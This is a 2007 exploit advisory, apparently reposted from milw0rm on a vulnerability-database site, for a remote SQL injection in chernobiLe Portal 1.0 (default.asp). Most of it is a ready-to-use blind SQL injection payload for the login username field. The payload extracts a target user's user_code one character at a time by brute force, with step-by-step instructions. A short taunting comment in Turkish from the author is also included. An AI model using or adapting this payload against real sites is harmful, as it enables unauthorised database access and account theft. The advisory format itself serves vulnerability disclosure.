Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15900
HistoryJan 29, 2007 - 12:00 a.m.

chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

2007-01-2900:00:00
vulners.com
23

Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

$$ : Not Free,Private

Info : /*

        Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
        Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
        aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
        *\

[[SQL]]]

http://[target]/[path]//default.asp (POST Method) [SQL]

Example:

Method: One Char Brute Force Technique

First,Please Register Before:

User:[username]'//and//(substring((SELECT//user_code//FROM//tblAuthor//WHERE/**/username='targetuser'),1,1))='A'/*
Pass:[userpass]

If Login True Then First Character = A
elSe Continue…

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

…

Im not Hacker!

milw0rm.com [2007-01-27]